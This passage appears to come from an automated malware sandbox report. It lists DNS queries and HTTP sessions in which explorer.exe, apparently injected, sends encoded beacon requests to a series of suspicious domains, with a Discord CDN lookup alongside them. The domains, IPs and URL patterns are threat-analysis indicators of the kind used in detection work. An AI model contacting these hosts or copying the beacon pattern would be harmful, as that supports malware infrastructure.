                                                                      Jun 11, 2021 12:22:06.240886927 CEST53531958.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:07.163625956 CEST5014153192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:07.214221954 CEST53501418.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:08.356827021 CEST5302353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:08.407419920 CEST53530238.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:09.767080069 CEST4956353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:09.817497015 CEST53495638.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:10.689029932 CEST5135253192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:10.739434958 CEST53513528.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:11.716619015 CEST5934953192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:11.766840935 CEST53593498.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:12.637265921 CEST5708453192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:12.687150955 CEST53570848.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:13.571747065 CEST5882353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:13.574343920 CEST5756853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:13.624598026 CEST53575688.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:13.633863926 CEST53588238.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:15.319762945 CEST5054053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:15.372864962 CEST53505408.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:16.263719082 CEST5436653192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:16.314495087 CEST53543668.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:17.196211100 CEST5303453192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:17.249077082 CEST53530348.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:18.288316011 CEST5776253192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:18.339855909 CEST53577628.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:30.572331905 CEST5543553192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:30.638999939 CEST53554358.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:38.267077923 CEST5071353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:38.343375921 CEST53507138.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:55.923523903 CEST5613253192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:55.982564926 CEST53561328.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:07.008698940 CEST5898753192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:07.009211063 CEST5657953192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:07.069541931 CEST53565798.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:07.073645115 CEST53589878.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:21.647491932 CEST6063353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:21.698964119 CEST53606338.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:22.282592058 CEST6129253192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:22.341458082 CEST53612928.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:24.622327089 CEST6361953192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:24.699976921 CEST53636198.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:26.527354002 CEST6493853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:26.588340998 CEST53649388.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:29.902024984 CEST6194653192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:30.068849087 CEST53619468.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:35.369520903 CEST6491053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:35.489573956 CEST53649108.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:40.546096087 CEST5212353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:40.613775015 CEST53521238.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:45.810470104 CEST5613053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:45.887887001 CEST53561308.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:51.185659885 CEST5633853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:51.259432077 CEST53563388.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:23:57.537866116 CEST5942053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:23:57.601284981 CEST53594208.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:09.374407053 CEST5878453192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:09.433257103 CEST53587848.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:10.457597017 CEST6397853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:10.518956900 CEST53639788.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:13.031668901 CEST6293853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:13.105762005 CEST53629388.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:17.293097019 CEST5570853192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:17.419354916 CEST53557088.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:22.433267117 CEST5680353192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:22.503843069 CEST53568038.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:27.700052023 CEST5714553192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:27.773278952 CEST53571458.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:32.965785027 CEST5535953192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:33.158107042 CEST53553598.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:38.497318983 CEST5830653192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:38.577857971 CEST53583068.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:24:43.591459990 CEST6412453192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:24:43.664848089 CEST53641248.8.8.8192.168.2.3

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jun 11, 2021 12:22:13.571747065 CEST192.168.2.38.8.8.80x2c43Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:24.622327089 CEST192.168.2.38.8.8.80xf7b7Standard query (0)www.cartercavanaugh.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:29.902024984 CEST192.168.2.38.8.8.80xc368Standard query (0)www.ayco.sucksA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:35.369520903 CEST192.168.2.38.8.8.80x3587Standard query (0)www.glocp9.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:40.546096087 CEST192.168.2.38.8.8.80xd96cStandard query (0)www.vigipharx.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:45.810470104 CEST192.168.2.38.8.8.80x6438Standard query (0)www.plastictohydrogen.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:51.185659885 CEST192.168.2.38.8.8.80xe976Standard query (0)www.mortgagenewsdailt.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:13.031668901 CEST192.168.2.38.8.8.80x4cfaStandard query (0)www.mortgagenewsdailt.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:17.293097019 CEST192.168.2.38.8.8.80xb909Standard query (0)www.catherinelazure.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:22.433267117 CEST192.168.2.38.8.8.80x77dfStandard query (0)www.amplifierconsulting.netA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:27.700052023 CEST192.168.2.38.8.8.80x26bbStandard query (0)www.plaquitasparamascota.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:32.965785027 CEST192.168.2.38.8.8.80x390bStandard query (0)www.indyoutlaws.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:38.497318983 CEST192.168.2.38.8.8.80x510dStandard query (0)www.nosequemierda.comA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:43.591459990 CEST192.168.2.38.8.8.80xd676Standard query (0)www.studiodates.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jun 11, 2021 12:22:13.633863926 CEST8.8.8.8192.168.2.30x2c43No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:22:13.633863926 CEST8.8.8.8192.168.2.30x2c43No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:22:13.633863926 CEST8.8.8.8192.168.2.30x2c43No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:22:13.633863926 CEST8.8.8.8192.168.2.30x2c43No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:22:13.633863926 CEST8.8.8.8192.168.2.30x2c43No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:21.698964119 CEST8.8.8.8192.168.2.30x9b90No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                      Jun 11, 2021 12:23:24.699976921 CEST8.8.8.8192.168.2.30xf7b7No error (0)www.cartercavanaugh.comcartercavanaugh.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 11, 2021 12:23:24.699976921 CEST8.8.8.8192.168.2.30xf7b7No error (0)cartercavanaugh.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:30.068849087 CEST8.8.8.8192.168.2.30xc368No error (0)www.ayco.sucks54.147.194.143A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:35.489573956 CEST8.8.8.8192.168.2.30x3587Server failure (2)www.glocp9.comnonenoneA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:40.613775015 CEST8.8.8.8192.168.2.30xd96cNo error (0)www.vigipharx.comvigipharx.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 11, 2021 12:23:40.613775015 CEST8.8.8.8192.168.2.30xd96cNo error (0)vigipharx.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:45.887887001 CEST8.8.8.8192.168.2.30x6438No error (0)www.plastictohydrogen.complastictohydrogen.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 11, 2021 12:23:45.887887001 CEST8.8.8.8192.168.2.30x6438No error (0)plastictohydrogen.com185.98.131.46A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:23:51.259432077 CEST8.8.8.8192.168.2.30xe976No error (0)www.mortgagenewsdailt.com81.17.18.198A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:13.105762005 CEST8.8.8.8192.168.2.30x4cfaNo error (0)www.mortgagenewsdailt.com81.17.18.198A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:17.419354916 CEST8.8.8.8192.168.2.30xb909Server failure (2)www.catherinelazure.comnonenoneA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:22.503843069 CEST8.8.8.8192.168.2.30x77dfNo error (0)www.amplifierconsulting.netamplifierconsulting.netCNAME (Canonical name)IN (0x0001)
                                                                      Jun 11, 2021 12:24:22.503843069 CEST8.8.8.8192.168.2.30x77dfNo error (0)amplifierconsulting.net34.102.136.180A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:27.773278952 CEST8.8.8.8192.168.2.30x26bbNo error (0)www.plaquitasparamascota.complaquitasparamascota.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 11, 2021 12:24:27.773278952 CEST8.8.8.8192.168.2.30x26bbNo error (0)plaquitasparamascota.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:33.158107042 CEST8.8.8.8192.168.2.30x390bNo error (0)www.indyoutlaws.comindyoutlaws.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 11, 2021 12:24:33.158107042 CEST8.8.8.8192.168.2.30x390bNo error (0)indyoutlaws.com192.185.11.167A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:38.577857971 CEST8.8.8.8192.168.2.30x510dName error (3)www.nosequemierda.comnonenoneA (IP address)IN (0x0001)
                                                                      Jun 11, 2021 12:24:43.664848089 CEST8.8.8.8192.168.2.30xd676No error (0)www.studiodates.comstudiodates.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 11, 2021 12:24:43.664848089 CEST8.8.8.8192.168.2.30xd676No error (0)studiodates.com107.180.44.132A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.cartercavanaugh.com
                                                                      • www.ayco.sucks
                                                                      • www.vigipharx.com
                                                                      • www.plastictohydrogen.com
                                                                      • www.amplifierconsulting.net
                                                                      • www.plaquitasparamascota.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.34973534.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 11, 2021 12:23:24.749768019 CEST840OUTGET /ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 HTTP/1.1
                                                                      Host: www.cartercavanaugh.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 11, 2021 12:23:24.887947083 CEST840INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 11 Jun 2021 10:23:24 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60ba412a-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.34974154.147.194.14380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 11, 2021 12:23:30.214973927 CEST4030OUTGET /ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 HTTP/1.1
                                                                      Host: www.ayco.sucks
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 11, 2021 12:23:30.354352951 CEST4768INHTTP/1.1 301 Moved Permanently
                                                                      Date: Fri, 11 Jun 2021 10:23:30 GMT
                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                      Location: http://www.ayco.sucks/ogpo?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0
                                                                      Content-Length: 401
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 79 63 6f 2e 73 75 63 6b 73 2f 6f 67 70 6f 3f 41 34 38 64 3d 7a 43 30 6b 77 50 35 62 4b 63 74 48 6c 66 4c 4f 42 32 2b 73 69 62 7a 63 47 4b 42 33 69 4d 48 65 71 45 65 2f 6a 49 75 47 77 70 58 77 68 58 45 30 52 7a 46 6f 2f 7a 6c 5a 4b 63 74 52 43 32 32 5a 53 65 68 6d 26 61 6d 70 3b 36 6c 52 3d 36 6c 56 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 63 6f 2e 73 75 63 6b 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.ayco.sucks/ogpo?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&amp;6lR=6lV0">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.ayco.sucks Port 80</address></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.34974234.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 11, 2021 12:23:40.658060074 CEST4769OUTGET /ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 HTTP/1.1
                                                                      Host: www.vigipharx.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 11, 2021 12:23:40.797790051 CEST4770INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 11 Jun 2021 10:23:40 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60c03ab8-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.349743185.98.131.4680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 11, 2021 12:23:45.956536055 CEST4771OUTGET /ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 HTTP/1.1
                                                                      Host: www.plastictohydrogen.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 11, 2021 12:23:46.177726030 CEST4772INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Fri, 11 Jun 2021 10:23:46 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Powered-By: PHP/7.3.27
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      Set-Cookie: PHPSESSID=ab594f30faefbfad908548750f3c4e85; path=/
                                                                      Vary: Host
                                                                      Data Raw: 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6b<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>404 Not Found</body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.34975234.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 11, 2021 12:24:22.546920061 CEST4909OUTGET /ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 HTTP/1.1
                                                                      Host: www.amplifierconsulting.net
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 11, 2021 12:24:22.687731028 CEST4910INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 11 Jun 2021 10:24:22 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60ba413e-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.34975334.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 11, 2021 12:24:27.820296049 CEST4910OUTGET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 HTTP/1.1
                                                                      Host: www.plaquitasparamascota.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 11, 2021 12:24:27.958565950 CEST4911INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 11 Jun 2021 10:24:27 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60c03ab8-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      HTTPS Packets

                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
